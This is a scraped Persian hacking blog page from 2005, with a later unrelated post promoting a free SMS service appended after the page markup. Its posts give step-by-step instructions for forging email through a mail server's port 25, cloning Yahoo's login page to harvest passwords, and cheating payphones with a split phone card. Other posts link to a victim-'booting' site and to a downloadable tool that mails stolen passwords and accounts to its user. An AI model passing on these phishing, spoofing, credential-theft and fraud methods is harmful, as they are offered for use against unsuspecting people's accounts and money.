<div id=postbody>خوب امروز میخوام درمورد پورت۲۵صحبت کنم.یکی از استفادهاش اینکه شما میتونین با استفاده از این روش یک ایمیل از طرف شخصی به دوستتون یا شخصی دیگر بفرستید مثلا شما میتونید یه نامه با ایمیل من به هر کسی میخوان بدید.البته این کار در صورت عدم اجازه ی شخص دارنده ایمیل غیر قانونی است.خوب این کار با نرم افزار Outlookوبا خوده ویندوز xpمیشه که در حوصله ی این مقاله نمیگنجد.شروع میکنیم شما باید ابتدا به کامپیوتر telnetکنین این دستور را در command promat ویندوزxpتایپ کنید(برای این کار start+allprogram+accesserios+command promat یا کلید ویندوز را رو کیبورد بگیرید و Rرا با هم بگیرید ودر Run تایپ کنیدcmd)بعدش این عبارتو تایپ کنید telnet mail server port به جایmail serverمیل سرور ایمیل مورد نظرتونو بنویسید مثلا اگر در یاهو است تایپ کنید mx4.mail.yahoo.comبعد اینترو بزنید بعد یه پیام خطا در یافت میکنید به این شکل Server 220 4Pfs (IMail7.12 3199-1)NT SMTP SERVERیه چیزی تو این مایه هاست اما اینجا شما به خاطر فارسی بودن صفحات شاید جای عددها رو بر عکس ببینید.سس مینویسید Helo اگه جلوی heloایمیل فرستنده رو بنویسید خوب تره چون کارتون یه مرحله جلو می افته با گرفتن جواب مثل این عبارتهhelo cruel_hackers@yahoo.comبعد باید منتظر جواب سلام باشید اگه جواب بده این عبارت استhelo 250 server 4Pfsمن دارم میگم باز شما به خاطر فارسی بودن صفحات عددها را بر عکس میبینید(این چند بار شد گفتم)برای فرستادن ایمیل از این دستور استفاده کنیدmail from cruel_hackers_ila@yahoo.com بازم Enter میکنیم بعد صبر میکنیم تا بگه okبعدش ایمیل گیرنده را مینویسم با این کد rcpt to:neda_khoshkel@yahoo.comتوجه کنید که به جای این ایمیل ها ایمیل های خودتونو بنویسید ( اینا جزو کدها نیستا **اینه..)بعد گرفتن okاینو تایپ کنیدDataبعد Enter کنیداینم جوابشok 354 send it;end with>سپس این عبارت به شما میگه که یه بار Enter کنید بعد یه بار نقطه تایپ کنید و بعدEnter بزنید(مفهومه که اگه نیست روشنت کونم...)حالا میگه Subjectبده یعنی عنوان نامه شما هم بدید و دوبار Enterکنیدبعد متن نامه را بنویسید در قسمت Fromبعد باز اون کاره بالا رو بکنین (یه بار Enterکنید و نقطه تایپ کنید و بازEnterکنید)اینم تمتم مراحلی که گفتم data 354 ok, send it; end with . From: cruel_hackers@yahoo.com to:neda_khoshkel subject:I love you inja ham matne khodetono minevisid 250 Message queued quit goodbye221 </tr><br>

<tr>
<div id=postdesc>
<a onclick="window.open('./Comments.bs?PostID=77','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات"> <a href="./?PostID=77" title="لینک یادداشت"><span dir=ltr>08:58 AM</span></a> | <a href="./Profile.bs?ID=23542980326212" target="_blank" title="نویسنده">مهدی</a> | <a href="./?Cat=8"  title="موضوع">هک بوت کرک ویروس</a> | <a onclick="window.open('./Comments.bs?PostID=77','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات">نظرات [0]</a></div>
</tr>
</div>
</div>

<div id=post>
<tr>
<div id=postdate>سه شنبه 1 آذر ماه سال 1384</div>
</tr>
<tr>
<div id=posttitle>بوت کردن از این آسونتر؟!!!</div>
</tr>
<tr>
<div id=postbody><P dir=rtl style="MARGIN-TOP: 0px; LINE-HEIGHT: 150%" align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">اینم سایتی که می بوته </FONT>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif"></FONT></P>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">سایتو بده به ترف وقتی که بره توش بوت می شه<IMG height=18 src="mhtml:file://D:Documents and Settings3lineDesktophack3.mht!http://blogfa.com/images/smileys/17.gif" width=18></FONT></P>
<P align=right><FONT face="Tahoma, Arial, Helvetica, sans-serif">یک دفه خودت نری توش کارتو بسازه بعد بگی ما ها آدمای بدی هستیم؟!<IMG height=18 src="mhtml:file://D:Documents and Settings3lineDesktophack3.mht!http://blogfa.com/images/smileys/02.gif" width=18></FONT></P>
<P><FONT face="Tahoma, Arial, Helvetica, sans-serif"> </FONT></P>
<P align=right><A style="COLOR: #f56a1c" href="http://www.eliteprodigy.com/admin/admin.html"><FONT face="Tahoma, Arial, Helvetica, sans-serif">http://www.eliteprodigy.com/admin/admin.html</FONT></A></P></tr><br>

<tr>
<div id=postdesc>
<a onclick="window.open('./Comments.bs?PostID=78','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات"> <a href="./?PostID=78" title="لینک یادداشت"><span dir=ltr>09:01 AM</span></a> | <a href="./Profile.bs?ID=23542980326212" target="_blank" title="نویسنده">مهدی</a> | <a href="./?Cat=8"  title="موضوع">هک بوت کرک ویروس</a> | <a onclick="window.open('./Comments.bs?PostID=78','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات">نظرات [0]</a></div>
</tr>
</div>
</div>

<div id=post>
<tr>
<div id=postdate>چهارشنبه 25 آبان ماه سال 1384</div>
</tr>
<tr>
<div id=posttitle>بهترین نوع فیلتر شکن</div>
</tr>
<tr>
<div id=postbody><P><A href="http://h1.ripway.com/3line/my saite file for do/fcBedehi.exe"><IMG src="http://h1.ripway.com/3line/my saite file for do/fordownload.bmp" border=0></A>اینم برنامه ای که آقا مرتضی درخواست کرده بودن ابتدا برنامه رو دانلود کنید برای کار کردن برنامه باید به قسمت Internet Option در Control Panel بروید و بر روی Connections رفته و بر روی سرویس اینترنتی که از آن استفاده می کنید و با آن را انتخاب نموده و بر روی Settings کلیک کنید - حال Use Proxy را تیک بزنید و در قسمت آدرس Localhost و در قسمت پورت 1111 را تایپ کنید اگه ایکون برنامه اون پااین ضاهر نشود بصورت دستی برنامه رو فعال کنید ...یا حق<IMG src="http://www.blogsky.com/images/smileys/029.gif"></P></tr><br>

<tr>
<div id=postdesc>
<a onclick="window.open('./Comments.bs?PostID=51','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات"> <a href="./?PostID=51" title="لینک یادداشت"><span dir=ltr>07:48 AM</span></a> | <a href="./Profile.bs?ID=23542980326212" target="_blank" title="نویسنده">مهدی</a> | <a href="./?Cat=8"  title="موضوع">هک بوت کرک ویروس</a> | <a onclick="window.open('./Comments.bs?PostID=51','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات">نظرات [0]</a></div>
</tr>
</div>
</div>

<div id=post>
<tr>
<div id=postdate>یکشنبه 22 آبان ماه سال 1384</div>
</tr>
<tr>
<div id=posttitle>چگونه پسورد کسی را بدون فرستادن فایل بزنی</div>
</tr>
<tr>
<div id=postbody><P align=right>ببینید شما ابتدا باید یک سایت مجازی در اینترنت درست کنید یک سایت شبیه سایت یاهو . که شما میتونید اینکار رو با کیلیک راست کردن بر روی سایت یاهو و انتخاب گزینه ویو سورس و پییس کردن در برنامه فرونت پیج کرده و که یک فایل متنی میباشد اگر توجه کنید خواهید دید که دز جایی از این متن ایمیل یاهو نوشته شده است شما ان را پاک کرده و بجای ان ایمیل خود را بنویسیدو با پسوند وب ان را سییو کنید . اگر کسی به این سایت مراجعه کند با صفحه ثبت نام یاهو مواجه می شود و به محض نوشتن پس و ایدی خود این پس و ای دی بجای اینکه برای یاهو فرستاده شود برای شما ارسال میگردد. اما این سایت رو چگونه اپلود کنیم شما می تو نید با مراجعه به سایت https://www.sharemation.com فضای رایگان دریافت کنید </P></tr><br>

<tr>
<div id=postdesc>
<a onclick="window.open('./Comments.bs?PostID=46','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات"> <a href="./?PostID=46" title="لینک یادداشت"><span dir=ltr>07:54 AM</span></a> | <a href="./Profile.bs?ID=23542980326212" target="_blank" title="نویسنده">مهدی</a> | <a href="./?Cat=8"  title="موضوع">هک بوت کرک ویروس</a> | <a onclick="window.open('./Comments.bs?PostID=46','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات">نظرات [1]</a></div>
</tr>
</div>
</div>

<div id=post>
<tr>
<div id=postdate>یکشنبه 22 آبان ماه سال 1384</div>
</tr>
<tr>
<div id=posttitle>کرک کردن کارت تلفن</div>
</tr>
<tr>
<div id=postbody>اول از همه یک کارت تلفن بگیرید هر قدر می خواهید استفاده کنید فقط 5تومان بمونه کافی بعد 2قسمتش کنید(از طول ) به صورتی که شناستونتوی 1قسمت بشه و یک تیکه دیگه هم از کارت بمونه سپس دو تاشون را با هم وارد کنید کنید وشماره را بگیرید اولین زنگ که خورد قسمت شناسه را بکشید بیرون و برین صفاااااااااااااااااا </tr><br>

<tr>
<div id=postdesc>
<a onclick="window.open('./Comments.bs?PostID=45','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات"> <a href="./?PostID=45" title="لینک یادداشت"><span dir=ltr>07:52 AM</span></a> | <a href="./Profile.bs?ID=23542980326212" target="_blank" title="نویسنده">مهدی</a> | <a href="./?Cat=8"  title="موضوع">هک بوت کرک ویروس</a> | <a onclick="window.open('./Comments.bs?PostID=45','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات">نظرات [1]</a></div>
</tr>
</div>
</div>

<div id=post>
<tr>
<div id=postdate>یکشنبه 22 آبان ماه سال 1384</div>
</tr>
<tr>
<div id=posttitle>برنامه ای برای ارسال پسورد اینترنت و اکانت اینترنت به زبان فارسی</div>
</tr>
<tr>
<div id=postbody><P>اسم این برنامه Behzad_ps+++7 که توجه داشته باشید تو این برنامه پسورد و سایر چیزا برای شما میل میشه و به صورت Bulk برای شما ارسال میشه.</P>
<P align=center> <A href="http://www.aminbooter.persiangig.com/audio/behzad-psV1.7.zip">Download </A></P></tr><br>

<tr>
<div id=postdesc>
<a onclick="window.open('./Comments.bs?PostID=44','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات"> <a href="./?PostID=44" title="لینک یادداشت"><span dir=ltr>07:39 AM</span></a> | <a href="./Profile.bs?ID=23542980326212" target="_blank" title="نویسنده">مهدی</a> | <a href="./?Cat=8"  title="موضوع">هک بوت کرک ویروس</a> | <a onclick="window.open('./Comments.bs?PostID=44','_blank','width=400, height=450, scrollbars=yes, resizable=yes');" href="javascript:void(0)" title="نظرات">نظرات [4]</a></div>
</tr>
</div>
</div>

</div>
<div id=sidebar>
<h2>فهرست اصلی</h2>
<ul>
<li><a href="http://3line3.blogsky.com">صفحه نخست</a></li>
<li><a href=type=button value="   بستن صفحه   " onClick="javascript:window.close();">بستن صفحه</a></li>
<li><a href="javascript:window.external.AddFavorite('http://http://3line3.blogsky.com.blogsky.com',' جاوا-هک-اس ام اس-آموزش-قالبهای بلاگ اسکای ')"title="اضافه به علاقه مندیها">اضافه به علاقه مندیها</a></li>
<li><a onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('http://3line3.blogsky.com');" href="javascript:void(0)" title="خانگی سازی">خانگی سازی</a> <a href="javascript:window.external.AddFavorite('http://http://3line3.blogsky.com.blogsky.com',' جاوا-هک-اس ام اس-آموزش-قالبهای بلاگ اسکای ')" title="اضافه به علاقه مندیها"></a></li>
<li><a href="http://www.irankorea.com/3line/profile.php?mode=register">ثبت نام در انجمن</a></li>
<li><a href="http://www.irankorea.com/3line/index.php">ورود به انجمن</a></li>
</ul>
<BlogLinkDumpBlock>
<BlogProfile>
<h2>پیوندهای روزانه</h2>
<ul>

<li><a href="http://3line3.blogsky.com/?PostID=389" title="سه شنبه 29 آذر ماه سال 1384" target="_blank">جدید ترین روش کسب درامد از اینترنت</a><br></li><br><br>

<li><a href="http://switch.dl.sourceforge.net/sourceforge/sevenzip/7z431.exe" title="پنجشنبه 17 آذر ماه سال 1384" target="_blank">جدیدترین فشرده ساز   7z</a><br></li><br><br>

</ul>
</BlogProfile>
<h2>لینک دوستان</h2>
<ul>

<li><a href="http://topoli6612.blogsky.com/" target="_blank">توپولی</a></li><br>

<li><a href="http://www.asemoun-hasty.blogsky.com/" target="_blank">آسمون هستی</a></li><br>

<li><a href="http://www.mixirannet.tk/" target="_blank">اوستا میکس ایران نت</a></li><br>

<li><a href="http://myendlesslove.blogsky.com/" target="_blank">عرشیا+عاشقانها</a></li><br>

<li><a href="http://xpsoft.blogsky.com/" target="_blank">شاهرخ دانلود</a></li><br>

<li><a href="http://divoonekhodeti.blogsky.com/" target="_blank">دیووووونه</a></li><br>

<li><a href="http://www.abehzadian.blogsky.com" target="_blank">منشور دانش</a></li><br>

<li><a href="http://www.abrishamgames.tk/" target="_blank">ایستگاه کامپیوتر</a></li><br>

<li><a href="http://badboyzmashad.blogsky.com/" target="_blank">پسران بد مشهـــــد</a></li><br>

<li><a href="http://www.asemoun-hasty.blogsky.com/" target="_blank">آسمون هستی</a></li><br>

<li><a href="http://lordhackers.myblog.ir/" target="_blank">پادشاه هکرها</a></li><br>

<li><a href="http://isis.blogsky.com/" target="_blank">آیسیز</a></li><br>

<li><a href="http://gun.blogsky.com/" target="_blank">اسلحه</a></li><br>

<li><a href="http://mohajereshiraz.blogsky.com/" target="_blank">مهاجر شیراز</a></li><br>

<li><a href="http://emprator.blogsky.com/" target="_blank">خیلی دور خیلی نزدیک</a></li><br>

<li><a href="http://zamanphp.blogsky.com/" target="_blank">همراه با پی اچ پی</a></li><br>

<li><a href="http://www.taragheh.blogfa.com" target="_blank">دنیای علم</a></li><br>

<li><a href="http://iran-boys.mihanblog.com/" target="_blank">جاوا.فیلترشکن.ترفند</a></li><br>

<li><a href="http://www.Winpersian.com" target="_blank">WinPersian</a></li><br>

<li><a href="http://www.irantiger.blogfa.com/" target="_blank">ایران تایگر</a></li><br>

<li><a href="http://topiran.myblog.ir/" target="_blank">پیتزا مخلوط</a></li><br>

<li><a href="http://fsw.mihanblog.com" target="_blank">- دانلود موزیک-</a></li><br>

<li><a href="http://www.bavarsad.blogsky.com/" target="_blank">شهر من پارسوماش</a></li><br>

<li><a href="http://wouldlike.mihanblog.com/" target="_blank">دوست داشتن</a></li><br>

<li><a href="http://barname.blogsky.com/" target="_blank">دانلود</a></li><br>

<li><a href="http://www.baran3.blogsky.com/" target="_blank">بیکار بودم امدم وبلاگ زدم</a></li><br>

<li><a href="http://hajieh.blogsky.com/" target="_blank">حاجیه</a></li><br>

<li><a href="http://www.aminjok.blogsky.com/" target="_blank">وبلاگ جک</a></li><br>

<li><a href="http://www.lavashak.blogsky.com/" target="_blank">لواشک</a></li><br>

<li><a href="http://dadash-reza.blogfa.com/" target="_blank">داداش رضا</a></li><br>

<li><a href="http://www.mixirannet.tk/" target="_blank">اوستا میکس ایران نت</a></li><br>

<li><a href="http://stargan.blogfa.com" target="_blank">هتل 13 ستاره</a></li><br>

<li><a href="http://freedownloadiran.blogsky.com/" target="_blank">دانلود رایگان</a></li><br>

<li><a href="http://orod-iran.blogfa.com" target="_blank">I Love orod shoraka</a></li><br>

<li><a href="http://www.linkestan.com/" target="_blank">لینکستان</a></li><br>

<li><a href="http://www.alaska.blogfa.com/" target="_blank">ورودممنوع</a></li><br>

<li><a href="http://www.sergeant.blogfa.com" target="_blank">نوشته های یک مرد</a></li><br>

<li><a href="http://llee.blogsky.com/" target="_blank">English learning</a></li><br>

<li><a href="http://www.divonehsho.blogfa.com/" target="_blank">divonehsho</a></li><br>

<li><a href="http://icecream.blogsky.com/" target="_blank">بستنی</a></li><br>

</ul>
<BlogLinkDumpBlock>
<h2>آرشیو موضوعی</h2>
<ul>

<li><a href="./?Date=1384-08">آبان 1384</a></li>
												
													<li><a href="./?Date=1384-09">آذر 1384</a></li>
												
													<li><a href="./?Date=1384-10">دی 1384</a></li>
												
													<li><a href="./?Date=1384-11">بهمن 1384</a></li>
												
													<li><a href="./?Date=1384-12">اسفند 1384</a></li>
												
													<li><a href="./?Date=1385-01">فروردین 1385</a></li>
												
													<li><a href="./?Date=1385-02">اردیبهشت 1385</a></li>
												
													<li><a href="./?Date=1385-03">خرداد 1385</a></li>
												
													<li><a href="./?Date=1385-07">مهر 1385</a></li>
												
													<li><a href="./?Date=1385-10">دی 1385</a></li>

</ul>
</BlogLinkDumpBlock>
<h2>موضوع بندی</h2>
<ul>
												
    
													<li><a href="./?Cat=4">تمامی کدهای جاوا</a></li>
												
													<li><a href="./?Cat=5">اجرا کننده بازیهای پلی استیشن۲</a></li>
												
													<li><a href="./?Cat=8">هک بوت کرک ویروس</a></li>
												
													<li><a href="./?Cat=9">دانلود</a></li>
												
													<li><a href="./?Cat=13">آموزش جامع ایجاد وبلاگ</a></li>
												
													<li><a href="./?Cat=14">آموزش جامع  Delphi</a></li>
												
													<li><a href="./?Cat=15">ایجاد روبات در یاهو</a></li>
												
													<li><a href="./?Cat=17">ارسال SMS</a></li>
												
													<li><a href="./?Cat=18">نکات طلایی ویندوز</a></li>
												
													<li><a href="./?Cat=19">متفرقه</a></li>
												
													<li><a href="./?Cat=21">فلش</a></li>
												
													<li><a href="./?Cat=23">نکات حرفه ای یاهو</a></li>
												
													<li><a href="./?Cat=25">آموزش هیپنوتیزم</a></li>
												
													<li><a href="./?Cat=26">آموزش احظار ارواح</a></li>
												
													<li><a href="./?Cat=27">گالری عکس</a></li>
												
													<li><a href="./?Cat=28">ترفندهای رجیستری</a></li>
												
													<li><a href="./?Cat=29">سرگرمی</a></li>
												
													<li><a href="./?Cat=30">آکورد های گیتار</a></li>
												
													<li><a href="./?Cat=31">روشهای دختر بازی</a></li>
												
													<li><a href="./?Cat=33">ترفندهای یاهو</a></li>
												
													<li><a href="./?Cat=34">ترفند برنامه و تمهای موبایل</a></li>
												
													<li><a href="./?Cat=35">جدیدترین روش کسب درامد</a></li>
												
													<li><a href="./?Cat=37">قالبهای PearsianBlog</a></li>
												
													<li><a href="./?Cat=39">ساعتهای زیبای فلش</a></li>
												
													<li><a href="./?Cat=40">بخش آموزشی</a></li>
												
													<li><a href="./?Cat=41">اخبار جالب</a></li>
												
													<li><a href="./?Cat=42">موزیک ایرنی</a></li>
												
													<li><a href="./?Cat=43">Anti Hack & Trojan</a></li>
												
													<li><a href="./?Cat=45">قالبهای میهن بلاگ</a></li>
												
													<li><a href="./?Cat=46">قالبهای بلاگفا</a></li>
												
													<li><a href="./?Cat=47">قالبهای بلاگ اسکای</a></li>
												
													<li><a href="./?Cat=48">برنامه های فارسی</a></li>
												
													<li><a href="./?Cat=49">موبایل</a></li>

</ul>
<BlogCategoriesBlock>
<h2>لوگو</h2>

<td align="center">
								<center><img src="http://www.blogsky.com/users/blogs/logo/3line3.gif" width="83" height="31" alt="جاوا-هک-اس ام اس-آموزش-قالبهای بلاگ اسکای"><br>	<input type='text' value='<a href="http://3line3.blogsky.com" target="_blank"><img src="http://www.blogsky.com/users/blogs/logo/3line3.gif" alt="جاوا-هک-اس ام اس-آموزش-قالبهای بلاگ اسکای" border="0"></a>' dir='ltr' size='11' readonly>
		</center></td>
</BlogAuthorsBlock>
</BlogCategoriesBlock>
<BlogAuthorsBlock>
<h2>آمار</h2>
<ul style="border:none">
<li>افراد آنلاین: <script src="http://tools.majidonline.com/online.php?site=http://3line3.blogsky.com"></script></li>
<li>تعداد بازدیدها: 247287</li>
<li>
<script language="javascript" src="http://webgozar.com/c.aspx?Code=102466&t=counter"></script>
</li>
</ul>
<p id=feed>
<a href=<img src="http://rezagraph.persiangig.com/templates/tic-tac/rss.gif" width="36" height="14"></a></p>
</BlogAuthorsBlock>
<h2>ترجمه قالب</h2>
<p style="text-align:center;margin:0">
<p style="text-align:center;margin:0">
<a href="http://blogsky.com" style="color:#ff5000;font-weight: bold">مهدی حمیدی</a>
<center>
<a href="WwW.3line3.blogsky.com" style="color:#006699;font-weight: bold">WwW.3line3.blogsky.com</a>
</center>
<p> </p>
<p style="text-align:center;margin:0">
<embed width="100" height="40" src="http://clup3line.persiangig.com/image/my%20logo/MyFlashLogo/1.swf"></p><br>

<center>
Powered By<br><a href="http://blogsky.com" style="color:#ff5000;font-weight: bold">BLOGSKY.COM</a>
</center>
</p>
</div>
</div>
<div id=footer></div>
</div>
</body>
</html>

علی کاویانی دوشنبه 21 خرداد‌ماه سال 1386 ساعت 16:21

0 نظر

..::ارسال و دریافت ژیام کوتاه رایگان به کلیه ی کشورها با Zyb...

یکی از بهترین نرم افزار های ارسال پیام کوتاه از طریق اینترنت نرم افزار Zyb... می باشد که علاوه بر امکان ارسال پیام کوتاه به کلیه شبکه ها امکان دریافت پیام کوتاه از کلیه شبکه ها و نمایش آن بر روی کامپیوتر یا نرم افزار مستقل تحت وب ارائه شده توسط این شرکت را دارا می باشد. به طور مثال شما برای دوستتان از طریق سایت یا نرم افزار یک پیام کوتاه ارسال می کنید وی پس از دریافت پیام شما ، پاسخی برای شما می فرستد. پاسخ وی بلافاصله توسط نرم افزار نمایش داده می شود. این امکان نیز وجود دارد که پاسخ های ارسالی علاوره بر نمایش در نرم افزار به موبایل یا ایمیل شما هم ارسال شود. پر استفاده ترین قابلیت این نرم افزار توانایی تهیه نسخه پشتیان از دفترچه تلفن و قرار ملاقات های شما بدون نیاز به کابل، انفرا یا بلوتوث است. بیشترین کاربرد این قابلیت زمانیست که شما گوشی جدیدی تهیه کرده اید و باید کلیه اطلاعات دفتر تلفن گوشی قبلی را به گوشی جدید انتقال دهید . با این نرم افزار به راحتی و سرعت این کار انجام خواهد شد.

از دیگر قابلیت های این نرم افزار امکان کپی متن از روی وب به موبایل می باشد. فرض کنید شما در بازدید از یک سایت مطلبی توجه تان را جلب می کند و مایلید دیگر دوستانتان را نیز مطلع کنید. کافیست متن را کپی کرده و پس از انتخاب شماره دوست یا دوستان کلید ارسال را بزنید . به همین سادگی متن برایش / برایشان ارسال می شود. در صورتیکه متن طولانی باشد در قالب چند پیام ارسال می شود ولی هنگام دریافت بر روی گوشی به صورت یک پیام نمایش داده می شود.

برای شروع شما نیاز به ثبت نام "رایگان" در سایت ارائه دهنده این سرویس را دارید که از طریق این لینک قابل دسترسی است. پس از پر کردن فرم عضویت یک پیام حاوی پین کد برای شما از طریق موبایل ارسال خواهد شد که با وارد کردن این کد عضویت شما تایید خواهد شد و شما اعتبار رایگان برای ارسال پیام کوتاه را دریافت خواهید کرد. سپس نرم افزار را دریافت کرده و براحتی پیام کوتاه ارسال کنید!

اگر مایل به دریافت نرم افزار به هر دلیل (از جمله سرعت اتصال به اینترنت) نیستید میتوانید از نرم افزار مستقل تحت وب این سرویس دهنده استفاده کنید. البته نرم افزار تحت وب برخی از قابلیت ها را پشتیبانی نخواهد کرد.

دریافت نرم افزار با حجم 3.85 مگابایت ( لینک غیر مستقیم )

موزیک و هشدار دهنده های پیام کوتاه
Translate To English
برای استفاده از این نرم افزار نیازی به کرک و سریال نیست !

علی کاویانی دوشنبه 21 خرداد‌ماه سال 1386 ساعت 06:41

0 نظر